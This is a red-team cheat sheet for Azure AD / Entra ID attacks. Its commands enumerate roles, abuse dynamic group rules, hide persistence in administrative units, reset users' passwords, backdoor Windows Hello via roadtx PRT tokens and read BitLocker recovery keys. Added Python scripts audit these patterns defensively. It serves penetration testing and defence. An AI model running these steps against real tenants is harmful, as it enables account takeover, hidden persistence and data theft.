Azure AD - IAM
Root Management Group (Tenant) > Management Group > Subscription > Resource Group > Resource
- Users (User, Groups, Dynamic Groups)
- Devices
- Service Principals (Application and Managed Identities)
Users
- List users:
Get-AzureADUser -All $true
- Enumerate groups
- Enumerate members of the Global Administrator role:
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
- List custom (non-built-in) roles:
Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName
- Add user to a group
Dynamic Group Membership
Get groups that allow Dynamic membership:
- Powershell Azure AD:
Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}
- RoadRecon database:
select objectId, displayName, description, membershipRule, membershipRuleProcessingState, isMembershipRuleLocked from groups where membershipRule is not null;
Rule example: (user.otherMails -any (_ -contains "vendor")) -and (user.userType -eq "guest")
Rule description: any guest user whose secondary email contains the string 'vendor' will be added to the group.
- Open the user's profile and click on Manage
- Click on Resend invite to get an invitation URL
- Set the secondary email
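Added example (not code from the original cheat sheet): a small Python review script that evaluates the sample rule above against constructed users and flags dynamic groups whose active rule keys on an attribute the user or guest can influence themselves. Group rows use the column names of the RoadRecon query above; the set of user-influenced attributes and the case-insensitive string matching are assumptions made for the example.

```python
"""Audit dynamic group rules for dependence on user-influenced attributes.
Added example; the sample users and groups below are constructed."""
import re

# Attributes a user or invited guest can set or influence themselves.
# Assumption for this example, not an exhaustive Entra ID list.
USER_INFLUENCED_ATTRIBUTES = {"otherMails", "displayName", "givenName", "surname"}

# Matches references such as user.otherMails or user.userType inside a rule.
RULE_ATTRIBUTE = re.compile(r"\buser\.(\w+)")


def vendor_guest_rule(user: dict) -> bool:
    """Python equivalent of the page's rule:
    (user.otherMails -any (_ -contains "vendor")) -and (user.userType -eq "guest")
    String comparisons are treated as case-insensitive here (assumption)."""
    other_mails = user.get("otherMails") or []
    has_vendor_mail = any("vendor" in mail.lower() for mail in other_mails)
    is_guest = (user.get("userType") or "").lower() == "guest"
    return has_vendor_mail and is_guest


def referenced_attributes(rule: str) -> set:
    """All user.<attribute> names referenced by a membership rule."""
    return set(RULE_ATTRIBUTE.findall(rule))


def audit_dynamic_groups(groups: list) -> list:
    """Return groups whose active rule depends on a user-influenced attribute."""
    findings = []
    for group in groups:
        rule = group.get("membershipRule")
        if not rule or group.get("membershipRuleProcessingState") != "On":
            continue  # static group, or rule processing is paused
        risky = referenced_attributes(rule) & USER_INFLUENCED_ATTRIBUTES
        if risky:
            findings.append({
                "displayName": group["displayName"],
                "riskyAttributes": sorted(risky),
                "membershipRule": rule,
            })
    return findings


# Constructed sample data for the example.
SAMPLE_USERS = [
    {"userPrincipalName": "alice_vendor-corp.example#EXT#@contoso.onmicrosoft.com",
     "userType": "Guest", "otherMails": ["alice@vendor-corp.example"]},
    {"userPrincipalName": "bob@contoso.onmicrosoft.com",
     "userType": "Member", "otherMails": ["bob@vendor-corp.example"]},
    {"userPrincipalName": "carol_partner.example#EXT#@contoso.onmicrosoft.com",
     "userType": "Guest", "otherMails": ["carol@partner.example"]},
]

SAMPLE_GROUPS = [
    {"displayName": "Vendor Guests", "membershipRuleProcessingState": "On",
     "membershipRule": '(user.otherMails -any (_ -contains "vendor")) -and (user.userType -eq "guest")'},
    {"displayName": "Finance", "membershipRuleProcessingState": "On",
     "membershipRule": '(user.department -eq "Finance")'},
    {"displayName": "Legacy", "membershipRuleProcessingState": "Paused",
     "membershipRule": '(user.displayName -contains "temp")'},
    {"displayName": "Static Group", "membershipRuleProcessingState": None,
     "membershipRule": None},
]

if __name__ == "__main__":
    for user in SAMPLE_USERS:
        print(user["userPrincipalName"], "->", vendor_guest_rule(user))
    for finding in audit_dynamic_groups(SAMPLE_GROUPS):
        print(finding)
```

Only the first sample user (a guest with a vendor secondary mail) satisfies the rule; the audit reports the "Vendor Guests" group because its rule depends on otherMails, while the paused "Legacy" rule is skipped.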
Administrative Unit
Enumerate Administrative Units.
PS AzureAD> Get-AzureADMSAdministrativeUnit -All $true
PS AzureAD> Get-AzureADMSAdministrativeUnit -Id <ID>
PS AzureAD> Get-AzureADMSAdministrativeUnitMember -Id <ID>
PS AzureAD> Get-AzureADMSScopedRoleMembership -Id <ID> | fl
PS AzureAD> Get-AzureADDirectoryRole -ObjectId <RoleId>
PS AzureAD> Get-AzureADUser -ObjectId <RoleMemberInfo.Id> | fl
Administrative Units can be used as a persistence mechanism. When the visibility attribute is set to HiddenMembership, only members of the administrative unit can list other members of the administrative unit.
az rest \
--method post \
--url https://graph.microsoft.com/v1.0/directory/administrativeUnits \
--body '{"displayName": "Hidden AU Administrative Unit", "isMemberManagementRestricted":false, "visibility": "HiddenMembership"}'
- Create a new Administrative Unit using the New-MgDirectoryAdministrativeUnit cmdlet.
Connect-MgGraph -Scopes "AdministrativeUnit.ReadWrite.All"
Import-Module Microsoft.Graph.Identity.DirectoryManagement
$params = @{
    displayName = "Marketing Department"
    description = "Marketing Department Administration"
    visibility = "HiddenMembership"
}
New-MgDirectoryAdministrativeUnit -BodyParameter $params
- Add a member with New-MgDirectoryAdministrativeUnitMemberByRef
Connect-MgGraph -Scopes "AdministrativeUnit.ReadWrite.All"
Import-Module Microsoft.Graph.Identity.DirectoryManagement
$administrativeUnitId = "0b22c83d-c5ac-43f2-bb6e-88af3016d49f"
$paramsUser1 = @{
    "@odata.id" = "https://graph.microsoft.com/v1.0/users/52e26d18-d251-414f-af14-a4a93123b2b2"
}
New-MgDirectoryAdministrativeUnitMemberByRef -AdministrativeUnitId $administrativeUnitId -BodyParameter $paramsUser1
- List members even when the administrative unit is hidden.
Connect-MgGraph -Scopes "AdministrativeUnit.Read.All", "Member.Read.Hidden", "Directory.Read.All"
Import-Module Microsoft.Graph.Identity.DirectoryManagement
$administrativeUnitId = "0b22c83d-c5ac-43f2-bb6e-88af3016d49f"
Get-MgDirectoryAdministrativeUnitMemberAsUser -AdministrativeUnitId $administrativeUnitId
- Assign the User Administrator role; its ID is 947ccf23-ee27-4951-8110-96c62c680311 in this tenant.
Connect-MgGraph -Scopes "RoleManagement.ReadWrite.Directory"
Import-Module Microsoft.Graph.Identity.DirectoryManagement
$administrativeUnitId = "0b22c83d-c5ac-43f2-bb6e-88af3016d49f"
$userAdministratorRoleId = "947ccf23-ee27-4951-8110-96c62c680311"
$params = @{
    roleId = $userAdministratorRoleId
    roleMemberInfo = @{
        id = "61b0d52f-a902-4769-9a09-c6528336b00a"
    }
}
New-MgDirectoryAdministrativeUnitScopedRoleMember -AdministrativeUnitId $administrativeUnitId -BodyParameter $params
- Now the user with the id 61b0d52f-a902-4769-9a09-c6528336b00a can edit the properties of the other users in the Administrative Unit.
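Added example (not code from the original cheat sheet): a Python review of administrative units as returned by Microsoft Graph, looking for the pattern described above (hidden membership, restricted management, and a scoped-role holder who is also a member of the unit and so can both see and manage the other members). The input is constructed and mirrors the Graph property names used on this page (visibility, isMemberManagementRestricted, members, scopedRoleMembers with roleId and roleMemberInfo); all IDs are placeholders, and the "member who also holds a scoped role" signal is a review heuristic, not a Microsoft-defined finding.

```python
"""Review administrative units for the hidden-membership persistence pattern.
Added example; the sample data below is constructed and the IDs are placeholders."""

SAMPLE_ADMIN_UNITS = [
    {
        "id": "AU-ID-1",
        "displayName": "Marketing Department",
        "visibility": "HiddenMembership",
        "isMemberManagementRestricted": False,
        "members": [{"id": "USER-ID-1"}, {"id": "USER-ID-2"}],
        "scopedRoleMembers": [
            {"roleId": "ROLE-ID-PLACEHOLDER", "roleMemberInfo": {"id": "USER-ID-1"}}
        ],
    },
    {
        "id": "AU-ID-2",
        "displayName": "Finance",
        "visibility": "Public",
        "isMemberManagementRestricted": False,
        "members": [{"id": "USER-ID-3"}],
        "scopedRoleMembers": [
            {"roleId": "ROLE-ID-PLACEHOLDER", "roleMemberInfo": {"id": "USER-ID-9"}}
        ],
    },
]


def review_admin_unit(au: dict) -> dict:
    """Summarise the properties a reviewer cares about for one administrative unit."""
    member_ids = {m["id"] for m in au.get("members", [])}
    role_holders = {s["roleMemberInfo"]["id"] for s in au.get("scopedRoleMembers", [])}
    # A scoped-role holder who is also a member can list the other members even
    # when membership is hidden, and can manage them: the pattern described above.
    self_managing = sorted(member_ids & role_holders)
    return {
        "displayName": au["displayName"],
        "hiddenMembership": au.get("visibility") == "HiddenMembership",
        "restrictedManagement": bool(au.get("isMemberManagementRestricted")),
        "scopedRoleHolders": sorted(role_holders),
        "membersHoldingScopedRole": self_managing,
    }


def flag_for_review(units: list) -> list:
    """Names of administrative units that warrant manual review."""
    flagged = []
    for au in units:
        summary = review_admin_unit(au)
        if (summary["hiddenMembership"] or summary["restrictedManagement"]
                or summary["membersHoldingScopedRole"]):
            flagged.append(summary["displayName"])
    return flagged


if __name__ == "__main__":
    for au in SAMPLE_ADMIN_UNITS:
        print(review_admin_unit(au))
    print("flagged:", flag_for_review(SAMPLE_ADMIN_UNITS))
```

Run against a real tenant, the same functions can consume the objects returned by Get-MgDirectoryAdministrativeUnit together with its members and scoped role members (converted to JSON); the only flagged unit in the sample is the hidden "Marketing Department", whose member USER-ID-1 also holds a scoped role.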
A user holding a role scoped to an Administrative Unit can reset the password of another user in that unit.
PS C:\Tools> $password = "Password" | ConvertTo-SecureString -AsPlainText -Force
PS C:\Tools> $user = Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "<Username>@<TENANT NAME>.onmicrosoft.com"}
PS C:\Tools> Set-AzureADUserPassword -ObjectId $user.ObjectId -Password $password -Verbose
Convert GUID to SID
The user's Entra ID object ID (a GUID) is translated to a SID by prefixing "S-1-12-1-" and appending the decimal value of each of the four 32-bit words of the GUID's binary form, each word read little-endian.
GUID: [a1]-[a2]-[a3]-[a4]-[a5] (8-4-4-4-12 hex digits)
SID: S-1-12-1-[dec(a1)]-[dec(a3 a2)]-[dec(le32(a4 a5[0:4]))]-[dec(le32(a5[4:12]))]
where le32(x) reads the four bytes of x in little-endian order.
For example, the representation of 6aa89ecb-1f8f-4d92-810d-b0dce30b6c82
is S-1-12-1-1789435595-1301421967-3702525313-2188119011
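Added example (not code from the original cheat sheet): a Python conversion in both directions. It reads the GUID in its 16-byte binary layout (first three fields little-endian, which is what uuid.UUID.bytes_le and .NET's Guid.ToByteArray() produce) as four little-endian 32-bit integers, and reproduces the page's example.

```python
"""Convert an Entra ID object ID (GUID) to its S-1-12-1 SID and back. Added example."""
import struct
import uuid

SID_PREFIX = "S-1-12-1-"


def guid_to_sid(guid: str) -> str:
    """Entra object ID -> SID, e.g. 6aa89ecb-1f8f-4d92-810d-b0dce30b6c82 ->
    S-1-12-1-1789435595-1301421967-3702525313-2188119011 (the page's example)."""
    # bytes_le gives the mixed-endian on-disk layout; unpack it as 4 x uint32 LE.
    words = struct.unpack("<IIII", uuid.UUID(guid).bytes_le)
    return SID_PREFIX + "-".join(str(w) for w in words)


def sid_to_guid(sid: str) -> str:
    """Inverse mapping; raises ValueError for SIDs that are not Entra-derived."""
    if not sid.startswith(SID_PREFIX):
        raise ValueError("not an Entra ID (S-1-12-1) SID")
    parts = sid[len(SID_PREFIX):].split("-")
    if len(parts) != 4:
        raise ValueError("expected exactly four sub-authorities after S-1-12-1")
    words = [int(p) for p in parts]
    if any(not 0 <= w <= 0xFFFFFFFF for w in words):
        raise ValueError("sub-authority out of 32-bit range")
    return str(uuid.UUID(bytes_le=struct.pack("<IIII", *words)))


if __name__ == "__main__":
    sid = guid_to_sid("6aa89ecb-1f8f-4d92-810d-b0dce30b6c82")
    print(sid)
    print(sid_to_guid(sid))
```

The round trip is lossless, which is useful when correlating a SID seen in Windows event logs or local group membership on an Entra-joined device back to the directory object.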
Devices
List Devices
Connect-AzureAD
Get-AzureADDevice
$user = Get-AzureADUser -SearchString "username"
Get-AzureADUserRegisteredDevice -ObjectId $user.ObjectId -All $true
Device State
PS> dsregcmd.exe /status
+----------------------------------------------------------------------+
| Device State |
+----------------------------------------------------------------------+
AzureAdJoined : YES
EnterpriseJoined : NO
DomainJoined : NO
Device Name : jumpvm
- Azure AD Joined : https://pbs.twimg.com/media/EQZv62NWAAEQ8wE?format=jpg&name=large
- Workplace Joined : https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large
- Hybrid Joined : https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large
- Workplace joined on AADJ or Hybrid : https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large
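Added example (not code from the original cheat sheet): a Python parser for the key/value lines of dsregcmd /status output, with a classifier that maps the fields to the four join states listed above. The sample text is constructed in the shape of the excerpt; the field names (AzureAdJoined, DomainJoined, WorkplaceJoined) are the ones the tool prints.

```python
"""Parse dsregcmd /status output and derive the device join type. Added example."""
import re

# Constructed sample output, following the layout of the page's excerpt.
SAMPLE_STATUS = """\
+----------------------------------------------------------------------+
| Device State                                                         |
+----------------------------------------------------------------------+

             AzureAdJoined : YES
          EnterpriseJoined : NO
              DomainJoined : NO
               Device Name : jumpvm

+----------------------------------------------------------------------+
| User State                                                           |
+----------------------------------------------------------------------+

                    NgcSet : NO
           WorkplaceJoined : NO
"""

# A 'Name : Value' line; box-drawing and blank lines do not match.
FIELD_LINE = re.compile(r"^\s*([A-Za-z][A-Za-z0-9 ]*?)\s*:\s*(.*?)\s*$")


def parse_dsregcmd(text: str) -> dict:
    """Map each 'Name : Value' line of the status output to a dict."""
    fields = {}
    for line in text.splitlines():
        match = FIELD_LINE.match(line)
        if match:
            fields[match.group(1)] = match.group(2)
    return fields


def join_type(fields: dict) -> str:
    """Classify the device into the join states distinguished above."""
    aad_joined = fields.get("AzureAdJoined") == "YES"
    domain_joined = fields.get("DomainJoined") == "YES"
    workplace = fields.get("WorkplaceJoined") == "YES"
    if aad_joined and domain_joined:
        base = "Hybrid Azure AD joined"
    elif aad_joined:
        base = "Azure AD joined"
    elif workplace:
        return "Workplace joined (Azure AD registered)"
    else:
        return "Not joined"
    # A workplace-joined user account on an already joined device (last case above).
    return base + (" + workplace joined" if workplace else "")


if __name__ == "__main__":
    parsed = parse_dsregcmd(SAMPLE_STATUS)
    print(parsed["Device Name"], "->", join_type(parsed))
```

The same parser can be pointed at a saved dsregcmd /status capture from any endpoint, which makes it easy to check a fleet for devices in an unexpected join state.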
Join Devices
Register Devices
Windows Hello for Business
roadtx.exe prtenrich --ngcmfa-drs-auth
roadtx.exe winhello -k swkdevicebackdoor.key
roadtx.exe prt -hk swkdevicebackdoor.key -u <user@domain.lab> -c swkdeviceup.pem -k swkdeviceup.key
roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
Bitlocker Keys
Install-Module Microsoft.Graph -Scope CurrentUser
Import-Module Microsoft.Graph.Identity.SignIns
Connect-MgGraph -Scopes BitLockerKey.Read.All
Get-MgInformationProtectionBitlockerRecoveryKey -All
Get-MgInformationProtectionBitlockerRecoveryKey -BitlockerRecoveryKeyId $bitlockerRecoveryKeyId
Service Principals
PS C:\> Get-AzureADServicePrincipal
ObjectId AppId DisplayName
-------- ----- -----------
00221b6f-4387-4f3f-aa85-34316ad7f956 e5e29b8a-85d9-41ea-b8d1-2162bd004528 Tenant Schema Extension App
012f6450-15be-4e45-b8b4-e630f0fb70fe 00000005-0000-0ff1-ce00-000000000000 Microsoft.YammerEnterprise
06ab01eb-3e77-4d14-ae31-322c7730a65b 09abbdfd-ed23-44ee-a2d9-a627aa1c90f3 ProjectWorkManagement
092aaf41-23e8-46eb-8c3d-fc0ee91cc62f 507bc9da-c4e2-40cb-96a7-ac90df92685c Office365Reports
0ac66e69-5502-4406-a294-6dedeadc8cab 2cf9eb86-36b5-49dc-86ae-9a63135dfa8c AzureTrafficManagerandDNS
0c0a6d9d-48c0-4aa7-b484-4e46f77d8ed9 0f698dd4-f011-4d23-a33e-b36416dcb1e6 Microsoft.OfficeClientService
0cbef08e-a4b5-4dd9-865e-8f521c1c5fb4 0469d4cd-df37-4d93-8a61-f8c75b809164 Microsoft Policy Administration Service
0ea80ff0-a9ea-43b6-b876-d5989efd8228 00000009-0000-0000-c000-000000000000 Microsoft Power BI Reporting and Analytics
Other
Lists all the client IDs you can use to get a token with the mail.read scope on the Microsoft Graph:
roadtx getscope -s https://graph.microsoft.com/mail.read
roadtx findscope -s https://graph.microsoft.com/mail.read
References
- Pentesting Azure Mindmap
- AZURE AD cheatsheet - BlackWasp
- Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020
- AZURE AD INTRODUCTION FOR RED TEAMERS - Aymeric Palhière (bak) - 2020-04-20
- Training - Attacking and Defending Azure Lab - Altered Security
- Hidden in Plain Sight: Abusing Entra ID Administrative Units for Sticky Persistence - Katie Knowles - September 16, 2024
- Create Sticky Backdoor User Through Restricted Management AU - Datadog, Inc